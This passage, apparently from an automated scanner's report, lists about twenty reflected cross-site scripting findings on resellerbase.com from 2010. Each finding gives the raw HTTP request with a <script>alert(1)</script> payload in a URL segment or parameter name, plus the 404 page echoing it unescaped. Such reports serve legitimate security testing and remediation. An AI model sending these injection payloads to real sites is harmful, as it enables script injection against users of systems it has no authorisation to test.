Date: Wed, 17 Nov 2010 23:21:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/232527e<script>alert(1)</script>3fe344ba4c7/themes/ was not found on this server.</p>
...[SNIP]...

2.1850. http://www.resellerbase.com/detail/23/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b00b<script>alert(1)</script>8d91692fede was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes8b00b<script>alert(1)</script>8d91692fede/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes8b00b<script>alert(1)</script>8d91692fede/ was not found on this server.</p>
...[SNIP]...

2.1851. http://www.resellerbase.com/detail/23/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bc414<script>alert(1)</script>33c3ae3a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/?bc414<script>alert(1)</script>33c3ae3a1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/?bc414<script>alert(1)</script>33c3ae3a1=1 was not found on this server.</p>
...[SNIP]...

2.1852. http://www.resellerbase.com/detail/23/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa5e0<script>alert(1)</script>a1c962b7b73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaa5e0<script>alert(1)</script>a1c962b7b73/23/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaa5e0<script>alert(1)</script>a1c962b7b73/23/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1853. http://www.resellerbase.com/detail/23/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a300d<script>alert(1)</script>6b41e1d7814 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23a300d<script>alert(1)</script>6b41e1d7814/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23a300d<script>alert(1)</script>6b41e1d7814/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1854. http://www.resellerbase.com/detail/23/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3d8dd<script>alert(1)</script>28fe1a52c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes3d8dd<script>alert(1)</script>28fe1a52c8/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes3d8dd<script>alert(1)</script>28fe1a52c8/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1855. http://www.resellerbase.com/detail/23/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 825d6<script>alert(1)</script>560341326b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos825d6<script>alert(1)</script>560341326b5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos825d6<script>alert(1)</script>560341326b5/ was not found on this server.</p>
...[SNIP]...

2.1856. http://www.resellerbase.com/detail/23/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6988a<script>alert(1)</script>91ed9e8f740 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/?6988a<script>alert(1)</script>91ed9e8f740=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/?6988a<script>alert(1)</script>91ed9e8f740=1 was not found on this server.</p>
...[SNIP]...

2.1857. http://www.resellerbase.com/detail/23/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 41bb0<script>alert(1)</script>cbff780738a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail41bb0<script>alert(1)</script>cbff780738a/23/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail41bb0<script>alert(1)</script>cbff780738a/23/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1858. http://www.resellerbase.com/detail/23/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36531<script>alert(1)</script>0f11fbd120e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2336531<script>alert(1)</script>0f11fbd120e/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2336531<script>alert(1)</script>0f11fbd120e/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1859. http://www.resellerbase.com/detail/23/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5a654<script>alert(1)</script>1c3ca2721c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes5a654<script>alert(1)</script>1c3ca2721c1/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes5a654<script>alert(1)</script>1c3ca2721c1/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1860. http://www.resellerbase.com/detail/23/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ed65b<script>alert(1)</script>49842d2ca97 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmosed65b<script>alert(1)</script>49842d2ca97/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmosed65b<script>alert(1)</script>49842d2ca97/images/ was not found on this server.</p>
...[SNIP]...

2.1861. http://www.resellerbase.com/detail/23/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4c7aa<script>alert(1)</script>fedf6121cc6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images4c7aa<script>alert(1)</script>fedf6121cc6/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images4c7aa<script>alert(1)</script>fedf6121cc6/ was not found on this server.</p>
...[SNIP]...

2.1862. http://www.resellerbase.com/detail/23/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c82aa<script>alert(1)</script>bc6fc0f7874 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/?c82aa<script>alert(1)</script>bc6fc0f7874=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/?c82aa<script>alert(1)</script>bc6fc0f7874=1 was not found on this server.</p>
...[SNIP]...

2.1863. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3118<script>alert(1)</script>a49ff0fedf9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb3118<script>alert(1)</script>a49ff0fedf9/23/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb3118<script>alert(1)</script>a49ff0fedf9/23/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1864. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 46843<script>alert(1)</script>e4d3052b05b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2346843<script>alert(1)</script>e4d3052b05b/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2346843<script>alert(1)</script>e4d3052b05b/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1865. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 62a7c<script>alert(1)</script>c2f162597bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes62a7c<script>alert(1)</script>c2f162597bb/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes62a7c<script>alert(1)</script>c2f162597bb/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1866. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78d71<script>alert(1)</script>fc51722b8b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos78d71<script>alert(1)</script>fc51722b8b5/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos78d71<script>alert(1)</script>fc51722b8b5/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1867. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload faa4c<script>alert(1)</script>98635043a58 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/imagesfaa4c<script>alert(1)</script>98635043a58/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/imagesfaa4c<script>alert(1)</script>98635043a58/rating/ was not found on this server.</p>
...[SNIP]...

2.1868. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ea6b3<script>alert(1)</script>34d453db06e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/ratingea6b3<script>alert(1)</script>34d453db06e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/ratingea6b3<script>alert(1)</script>34d453db06e/ was not found on this server.</p>
...[SNIP]...

2.1869. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2ae58<script>alert(1)</script>7f506c4521a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating/?2ae58<script>alert(1)</script>7f506c4521a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

